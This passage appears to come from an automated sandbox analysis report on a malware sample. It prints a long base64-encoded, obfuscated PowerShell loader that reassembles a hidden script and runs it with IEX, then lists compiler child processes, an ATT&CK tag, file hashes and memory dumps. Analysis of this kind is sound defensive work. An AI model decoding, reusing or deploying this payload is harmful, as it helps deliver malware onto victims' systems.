0AGUAcgBGAEwAdQBjAGkAZgBsAE0AYQB0AHQAZQBhAEQAaQBhAGIAZQBkAFUAbgBvAGIAdgB2AG8AYgBsAGEAdAApAEQAYQBsAG0AYQA7AAoAUgB5AGsAZQAgAFsAUwBrAGEAZwAgAEQAVABhAHUAdABvAGwAQQBuAGEAbAB5AGwAQQBmAHYAbgBuAEkAQQBmAHMAdABpAG0AVABvAHIAdABvAHAAQgBpAGYAaQBnAG8ASABlAGwAcwBlAHIAQQBmAHIAZQB0AHQATgB5AHQAYQBhACgAUgBhAGsAcwBhACIAUwBrAHYAYgBlAHcAQgBlAGcAbwBuAGkAbABkAGkAZwBzAG4AVQBuAGQAZQBtAHMARAByAGkAawBrAHAAcwB5AG4AZwBlAG8AQgByAGEAbgBkAG8AQgBvAGgAYQB3AGwAQwBsAGEAdABjAC4ATABlAGQAZQBrAGQATQBhAGEAbABlAHIAcwBuAGUAcwBlAHYATwBvAGwAbwBnACIARgBvAHIAdAByACkAQQBwAG8AaQBkAF0AcwBrAHIAaQB2AHAASABqAGUAbQBtAHUATwB2AGUAcgBsAGIAUwBpAGwAdgBlAGwASQBuAGYAaQBnAGkARgByAHMAdABlAGMAWgBlAGsAcwAgACAARAB1AG0AbQBrAHMAUwBjAG8AZwBnAHQAQQBsAGwAZQBnAGEAVAByAG8AbQBtAHQAVQBuAHAAbABvAGkAQwB5AGsAZQBsAGMARABlAHYAaQBsACAAQgBsAGEAbgBrAGUATwByAHkAYwB0AHgAdQBuAGQAZQByAHQAQQBjAHQAaQBuAGUAQwByAGkAbQBzAHIAUwB0AG8AcgBtAG4ARgBhAHIAdgBuACAARQBmAGYAdQBsAGkARABvAG0AZQBzAG4AVAB1AHQAdABlAHQAQQByAHIAYQBjACAAUwBuAG8AbABkAEUAVQBkAGYAbAB5AG4ASwByAG8AbwBwAHUAUgBrAGUAaABlAG0AUABsAGUAdQByAFAATQBhAHIAaQB0AHIASABlAHQAZQByAGkAQwBhAGwAdgBhAG4AQQBmAGsAYQBzAHQARABpAGgAZAByAFAAUgBvAGcAZQByAHIATwB2AGUAcgBzAG8ARABlAHMAZQByAGMAVQBuAGIAbwByAGUAQwBhAGwAYwBhAHMAVQBuAGQAZQByAHMAUAByAGkAdgBhAG8ATgBvAHMAbwBnAHIAQQBuAHQAbwBjAHMAUABlAGUAcAB5ACgAZwBlAG4AZQByAGkAVABlAG4AdABvAG4AZgBlAGwAdABsAHQAVABvAGQAZAB5ACAATQBpAHIAaQBuAEwASwBpAGwAZABuAGUARABlAG0AbwBjAGYARgBvAHIAbQB5AHQASwBkAGIAbwBsACwAUABsAGUAagBuAGkAYQBuAHQAZQBuAG4AUwBqAGEAcwBrAHQASABlAHgAZQByACAAUwBwAGwAYQBjAG8AVQBmAG8AcgB1AHYAVABhAG4AeQBhAGUAUwBrAGkAYgBiAHIAUABpAG4AZABlAGcAUwBvAHUAZwBoACwATwBvAGUAYwBpAGkAUwB1AGYAZgByAG4AUAByAGkAbgB0AHQATQBlAGcAYQBwACAARgBsAGEAZwBlAFQAUwB5AG0AZgBvAGUAVABvAHAAcABlAG8AQwBoAHIAbwBtAHIAVQBkAHIAYQBhAGUAQgBvAGwAaQBnAHQATwB2AGUAcgBqACwAVgBlAGcAZQB0AGkASAB5AHMAdABlAG4AQwBsAGEAaQByAHQAQQBuAHQAaQBmACAARgByAHUAdABlAFYAVQBuAHIAbwBzAGEAVQBkAGQAYQBuAG4ASABhAHAAbABvAGQAVQBkAHAAbwBsAG8ARgBvAHIAcwB0AHAARQBjAG8AbgBvACwASABqAHMAcABuAGkAQgB5AHIAYQBhAG4ASwByAHMAZQBsAHQARwBlAG0AbQB1ACAATAB1AHMAawBlAFQATQBhAHIAaQBtAHIAUwBhAHAAcABoAGEARABlAHMAZQByAHYAZgBsAG4AcwBlAGUAbgBvAGUAcgByACwAQwBhAG0AcABoAGkAQgBlAHIAZQBnAG4AcwBtAHIAZQBvAHQAUwB2AGUAagBzACAAUABhAHQAaABvAEYASwByAGkAbQBpAG8ATABlAGcAaQB0AHIAcwBrAGEAbABhADEATQBlAHQAYQBtADMAVQBuAGMAbwBuADkASgB1AGwAZQB0ACwAQQBmAHMAawBlAGkASABlAHIAIABGAG4AUwB2AHIAaQBuAHQAdQBuAGkAdgBlACAARQB1AGYAbwByAE0AcwB0AHIAYQBpAGEAUwBjAGgAbwBvAG4ARwBlAG8AbABvAGcAQgBpAGoAZQBrACkAQwBvAGEAdABpADsACgBNAGEAcgBrAGUAfQAKAEcAbgB1AGUAcgAiAE4AbwBuAGQAaQBAAAoARwB5AHIAYQBsACQAVQBuAHAAdQBsAFEARABlAGwAcABsAHUASwBvAG4AawB5AGkAVABhAHAAZQB0AHIAVgBlAHIAcwBpAGsATQB5AGMAbwB0AHMAVwBhAHIAbABpAG8AQQBjAHQAaQBuADMAUwB0AG8AcgBtAD0AQgBvAHIAZQBtAFsAVQBkAGsAYQBzAFEAUgBhAG4AZwBlAHUATABvAG8AawBzAGkAUwBhAGEAcgBzAHIATQBlAHQAcgBvAGsAUwBwAGkAcgB0AHMARABpAHMAaAB3AG8AUwB0AGUAZwBuADEAQgBpAGwAdABpAF0ARgBvAHIAcwBvADoAWgBvAG8AYwB1ADoAbQB1AHQAYQBmAFYARQBzAHAAaQBuAGkAVQB0AGEAawBuAHIAZwByAGEAcABoAHQAQQByAHYAZQByAHUATAB1AHIAbQByAGEAQwBvAG0AbQBlAGwASwBhAG4AYQByAEEAUABlAHQAcgBhAGwASwBhAGYAZgBlAGwAVQBzAHkAbgBsAG8AUwBhAG4AZABzAGMAUABpAGIAcgBvACgAQQBkAHMAbwByADAAQQBjAGMAZQBsACwARQBwAGUAbQBiADEARwBnAGUAYgBnADAARABhAHQAYQBrADQARABhAHMAawBlADgAQQBsAGQAZQByADUARABqAGkAYgBvADcARQB1AGMAYQBpADYAUABsAGEAZwBzACwAZgBpAHMAawBlADEARQBuAHQAZQByADIAdwBoAGEAcgB2ADIAUABhAGwAbQBlADgATABpAHYAcwBzADgASwB2AGEAcgB0ACwAQQBzAHkAbABjADYAcwBlAG0AaQBiADQAUwBrAGkAcABwACkACgBFAGMAaABpAG4AJABWAGkAcgBrAGUAVgBKAHUAcABlACAAaQBTAHQAaQBnAG4AegBJAG4AdABlAHIAYwBNAHUAcwBzAGEAYQBLAGkAbABkAGUAYwBLAHUAcABvAG4AaABmAHIAbwBrAG8APQBEAHIAZwByAGUAKABCAHIAYQB2AGkARwBIAHkAcABvAGMAZQBDAGgAYQBtAHAAdABEAGUAbAB0AHIALQBoAGUAZABvAG4ASQBzAGsAcgBrAGsAdABVAG4AcQB1AGkAZQBTAG8AZgBmAGkAbQBQAHUAZABzAGUAUABNAGkAZABjAGgAcgBLAG8AbwByAGQAbwBMAGkAdABvAGcAcABnAHIAbgB0AGgAZQBIAHUAbgBkAHIAcgBqAGkAbgBnAGEAdABVAG4AZABlAHIAeQBIAG8AYwBrAGUAIABGAGEAcwBoAGkALQBUAGEAZwB1AGQAUABBAHQAdABhAGMAYQBBAGMAZQB0AHkAdAByAHIAaABhAHQAaABCAGEAbgBrAHMAIABTAG8AcgB0AGUAIgBDAGkAbgBjAGgASABTAGEAZwBmAHIASwBCAGoAZQBtAHUAQwBwAGkAZQB0AGUAVQBCAGUAZwB1AGkAOgB0AHUAcgBuAHUAXABVAG4AZABlAHIAUwBTAHUAYgBlAHQAbwBQAGwAdQBnAGcAZgBzAHkAbgBnAGUAdABCAGUAZABzAHAAdwBMAGUAZwBpAG8AYQBwAGUAZQBwAGUAcgBQAHUAZwBlAG4AZQBMAG8AZwBvAGcAXABIAG8AdQBzAGUAbwBTAGkAZwB0AHYAdgBJAG0AYQBnAGkAZQBQAG8AcgByAHkAcgBTAGEAcABpAGUAYgBTAHAAaQBuAGQAZQBGAGEAawBpAHIAIgBCAHIAbwBkAGUAKQBNAGkAZwBtAGEALgBUAG8AcgBpAGwAUABBAGMAIABUAHIAYQBQAHIAbwBmAHUAbgBTAHQAdQBkAGUAdABBAG0AYQB5ACAAaQBFAG0AYgBhAHIAbAAKAHMAcABvAHIAdAAkAFMAdgBhAGwAZQBoAE0AYwBjAGwAYQBhAEIAZQByACAAUAB2AFMAaQBiAGkAcgBmAHUAbAB2AHMAcgBpAFMAcABpAHIAaQBzAGMAaABhAGUAdAAgAFMAbwBlAGwAdgA9AEQAZQBhAG4AYQAgAEcAcgB1AGYAZgBbAFYAZQBuAHQAZQBTAEgAYQBhAHIAcwB5AFMAZQBsAHMAawBzAFQAYQB1AHIAaQB0AEsAbQBwAGUAaABlAE8AZABvAG4AdABtAFMAZQBtAGkAbgAuAFcAaAB1AHQAdABDAEkAbgBkAHMAawBvAFYAYQBsAGsAeQBuAEcAdQBsAGQAcAB2AE0AYQBuAGcAbABlAEUAbQBwAGwAYQByAGMAZQBsAGkAbwB0AFYAcwBrAGUAdABdAFUAbgBkAGUAcgA6AE4AZwB0AGUAbAA6AEEAZgB2AGEAbgBGAFQAbwBsAGQAcAByAE0AbwBwAGgAZQBvAEEAZAByAGUAcwBtAGIAYQBrAG4AaQBCAFIAaABlAG0AaQBhAEUAZgBmAGUAbQBzAEEAYwBjAGUAcwBlAEIAcgB1AGcAZQA2AFMAdgBpAG4AZQA0AEQAZQBjAGEAcABTAFMAdABlAHYAZQB0AHQAYQBkAGUAYQByAFAAYQBnAGEAbgBpAEEAaQBnAHUAaQBuAEMAbwBuAGYAZQBnAEkAcgBpAGQAZQAoAFQAZQBtAGEAbgAkAEcAYQBsAHYAYQBWAFMAZQBrAHQAZQBpAFAAcgBpAHYAYQB6AEwAYQB0AGkAbgBjAFIAZQBmAGwAZQBhAFUAbgBpAG4AZwBjAEYAbABhAHUAbgBoAEwAZQBqAGYAZgApAAoATQBhAGEAbAB0AFsAUwBhAG4AZwBzAFMARgBvAHIAaABqAHkASABhAGwAbABvAHMARgBsAGwAZQBkAHQATQBhAGgAbwBnAGUAQwBpAHIAYwB1AG0ATABpAHMAdABpAC4ATgB1AGQAaQBzAFIAUgBpAGcAbQBhAHUAUAByAGUAdABlAG4AQwBoAGUAbQBpAHQARABhAG4AbQBhAGkAcAByAG8AdABlAG0ATwB2AGUAcgBkAGUAQgBvAHIAZAB2AC4AdgBpAGMAZQB2AEkAUABsAGkAcwBzAG4AdABlAGwAZQBrAHQAQwByAGUAdABpAGUAYQBrAHMAaQBhAHIAdAByAG8AbgBzAG8AUwBpAGsAcgBlAHAAUwB0AGkAZwBlAFMAUABqAGEAdAB0AGUAcABlAGQAaQBjAHIAaABpAGQAawBhAHYAUAByAGUAcwBhAGkARQBrAHMAcABlAGMAQQBuAHMAdABhAGUAQQBuAHMAdABhAHMAQwBhAG4AbgBlAC4AVABlAHUAdABvAE0AQwBlAGwAZQBiAGEAUwB5AHQAdABlAHIAUwBvAHIAdABzAHMARwBlAG4AYQBuAGgAbABhAGMAZQBkAGEAUwB0AHUAZABlAGwAVABhAGwAZQBuAF0AVQBwAGYAbwBsADoATgBvAG4AZABpADoAYwB1AHYAaQBlAEMAVQBuAGgAZQBlAG8ARgByAG8AbgBkAHAARABhAG4AawAgAHkATQBhAG4AZABhACgAUABhAHAAYQB2ACQASwBqAG8AcgB0AGgAQQBmAHQAZQByAGEARgBvAHIAZABrAHYARABlAHIAZQBsAGYARwByAGkAbABsAGkARgBvAHIAYgByAHMAUwBrAG8AbABkACwAUABvAHIAcABoACAARABlAGIAZQB0ADAARABvAHIAZwBzACwAVQBuAGQAaQBzACAAQQByAGIAZQBqACAAQwBoAHUAYwBrACQARwBhAGIAbwBuAFEATwB2AGUAcgBtAHUAZAB5AHAAbgBvAGkAQQBuAGEAdABvAHIARQBuAGQAbwBuAGsASQBuAHUAcwB0AHMASQBtAGEAZwBpAG8ARwBlAHIAbQBhADMARABpAHMAbwByACwATQBlAHMAbwB0ACAAUABhAHQAaQBlACQARgBvAHIAaABvAGgASAB2AGkAcgB2AGEAVABlAGsAbgBvAHYAQwBvAG0AcABlAGYAUABvAHMAdAB2AGkAUABhAGEAdABhAHMAUwB0AHIAYQB0AC4AQwBhAHIAaQBzAGMAQQBiAGUAcgBzAG8AQgBlAHQAZQBnAHUATgBpAHQAcgBvAG4AUwBvAHAAaABpAHQARABhAHQAYQBsACkAYgBhAHIAYgBhADsACgBUAGEAbABsAGUAWwBTAHUAbABmAG8AUQBSAGQAaAB1AGQAdQBEAHUAZgBmAGUAaQBQAHUAbgB0AGkAcgBBAHgAbwBpAGQAawBPAHAAdAByAGEAcwBUAG8AYQAgAFUAbwBGAG8AcgBmAG8AMQBUAHUAbABsAGkAXQBUAGUAdABlAHIAOgBTAHAAZQBjAGkAOgBIAGUAdABlAHIARQBwAHMAaQB0AHQAbgBHAHIAdQBlAGwAdQBFAGsAcwBhAG0AbQBSAGkAcABwAGwAUwBNAG8AbABvAGMAeQBMAGkAdAB0AGUAcwBNAHkAZQBsAGEAdABJAG4AZQB4AHAAZQB3AGkAbABkACAAbQBTAHcAaQB6AHoATABEAGUAdQB0AGUAbwBPAHAAdABpAG0AYwBFAGMAaABpAG4AYQBSAGUAcABlAG4AbABCAGUAdgBlAHQAZQByAGUAcwB2AGEAcwBGAGEAbABrAGUAQQB2AGUAbABvAHAAKABJAG4AZABzAGsAJABXAGgAYQBsAGUAUQBLAGEAbQBpAGsAdQBBAHMAcABoAHkAaQBGAG8AcgBoAGEAcgBTAHkAbgBlAG4AawBEAGkAbQBpAG4AcwBOAG8AbgBjAGUAbwBFAHIAZQBtAGkAMwBTAGEAZwBmAHIALABaAG8AbwB0AGgAIABTAHQAcgBpAGsAMABVAG4AZABlAHIAKQBGAGUAcgBtAGUAIwAKACcAQAANAAoADQAKAA0ACgBGAG8AcgAoACQAaQA9ADUAOwAgACQAaQAgAC0AbAB0ACAAJABGAHIAaQBnAHIAZQBsAHMALgBMAGUAbgBnAHQAaAAtADEAOwAgACQAaQArAD0AKAA1ACsAMQApACkADQAKAHsADQAKAAkADQAKAAkAJABQAGwAYQBkACAAPQAgACQAUABsAGEAZAAgACsAIAAkAEYAcgBpAGcAcgBlAGwAcwAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABpACwAIAAxACkADQAKAAkADQAKAAkAaQBmACAAKAAkAEYAcgBpAGcAcgBlAGwAcwAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABpACsAMQAsACAAMQApACAALQBlAHEAIAAiAGAAbgAiACkAIAB7AA0ACgAJAAkAJABQAGwAYQBkACAAPQAgACQAUABsAGEAZAAgACsAIAAiAGAAbgAiAA0ACgAJAAkAJABpACAAPQAgACQAaQAgACsAIAAxAA0ACgAJAH0AIAAJAA0ACgAJAAkADQAKAAkADQAKAH0ADQAKAA0ACgANAAoASQBFAFgAIAAkAFAAbABhAGQADQAKAA=="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1960
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\w2ocak6c.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1656
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES606A.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC6069.tmp"
      4⤵
      PID:944

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES606A.tmp

Filesize
1KB

MD5
4d029b3ad8ac3255c6637d5f61871cd5

SHA1
0bfa48028d3eb397794492cb889529808df9e410

SHA256
4bd0ae7c384fadd27ee4946a88a61a523d8331a6965778cffca7d7a1ad84563c

SHA512
fa6ab5df5f1ede3b37c5f69db10d3f66d638e6e5cf9e2dcf03a9775a61cdb1f2e380102c7589029b78c0a6c0b995594ca7e222d88e9cf9e14db86fadc482ab06

Download Submit
C:\Users\Admin\AppData\Local\Temp\w2ocak6c.dll

Filesize
4KB

MD5
e4640d65e56cea0bd657ae568dd9b918

SHA1
8fc79660479e84f3a07f114b82e1b683db571b0c

SHA256
a2e6cc05575e311b11b675b74bb9479c7cae1bd233e5a62a8d6160b9b7dc8b08

SHA512
91b0f08b86a6c121814b359f55e792915840422c1ad2abd5fa8d84c2c354dca103ec036eea3d86a5aae144f0d4b4d8be4ba653da9adcb23eef69d58b584896fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\w2ocak6c.pdb

Filesize
7KB

MD5
50791c28d3a12ad2df7d79209af6b71b

SHA1
e5d022bf5129099e1129f05c98af9f769b077c58

SHA256
191312e51cd3e554298f14ed7304e562d10c4891e3921ccb4dc2668b49ff64d3

SHA512
65e173f89613ff493934d44741a8f3fc2b454f734711e27e3e95eeb3c471f5823270322723812ba01b6081464d6f9211ecacc8d836beb38360aab14905c3b6d7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC6069.tmp

Filesize
652B

MD5
f3fab1099f65f366b71b245463e069c1

SHA1
433681f2d9e62eaab77f7429088155b6efb42c98

SHA256
90283408a2b8fd183ea05fa7be765660fdec58ca55b384aa6299c0f63e62dc8b

SHA512
75a026d469a55b71586bc949fd485dc072b161c4cc8280096d96c2ae174f8c3a3178f55ebb322f93bc5a017db9871bd2afabb4e260850cb3a454b26abc028d9c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\w2ocak6c.0.cs

Filesize
1KB

MD5
84d823528b1a6dad43df7554db52c642

SHA1
24a70c2417ce3444bb97daa3d0553775274c3861

SHA256
180245898f3e1f82261a4cc75ef901ef774f783d69dcd36feb39d371814f93cd

SHA512
97c83e6ed22468df31d9c88862b616322138db3171aceedde48b5121d099580681a27d728418dc45f1cf05a0f8b0130ef2157ee61d78e2f0e52be082ca5d7bb8

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\w2ocak6c.cmdline

Filesize
309B

MD5
2b9ff228085bac802d335c580cdc0b3b

SHA1
2eaf35c71f13ee29d410c767c405d27c889ee850

SHA256
6c32de9d0a10cf1c77942807adb6699f150a17cfcc90dca2e24e079d07af0453

SHA512
2f096e71b1b8855cd90d3a977436466309532bbccf3d3b5ba6e3031c3aa28a696adc575d5435117601781d70e737e21b2e5e41fa5138478d83c6a6e6a8814a4e

Download Submit
memory/944-61-0x0000000000000000-mapping.dmp

Download
memory/1512-54-0x000007FEFC181000-0x000007FEFC183000-memory.dmp

Filesize
8KB

Download
memory/1656-58-0x0000000000000000-mapping.dmp

Download
memory/1960-57-0x00000000741C0000-0x000000007476B000-memory.dmp

Filesize
5.7MB

Download
memory/1960-56-0x00000000756A1000-0x00000000756A3000-memory.dmp

Filesize
8KB

Download
memory/1960-55-0x0000000000000000-mapping.dmp

Download
memory/1960-66-0x00000000059C0000-0x0000000005AC0000-memory.dmp

Filesize
1024KB

Download
memory/1960-67-0x00000000741C0000-0x000000007476B000-memory.dmp

Filesize
5.7MB

Download
memory/1960-68-0x00000000059C0000-0x0000000005AC0000-memory.dmp

Filesize
1024KB

Download

Analysis

Sharing